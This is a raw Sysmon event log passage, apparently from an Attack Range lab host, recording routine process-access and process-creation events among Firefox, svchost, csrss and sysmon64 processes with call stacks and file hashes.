Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.455{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.27.839066311\1710581146" -childID 4 -isForBrowser -prefsHandle 4928 -prefMapHandle 4736 -prefsLen 11300 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 4212 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.443{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.411{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.411{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.411{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.395{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.286{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.248{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.248{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.248{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.243{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.192{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla 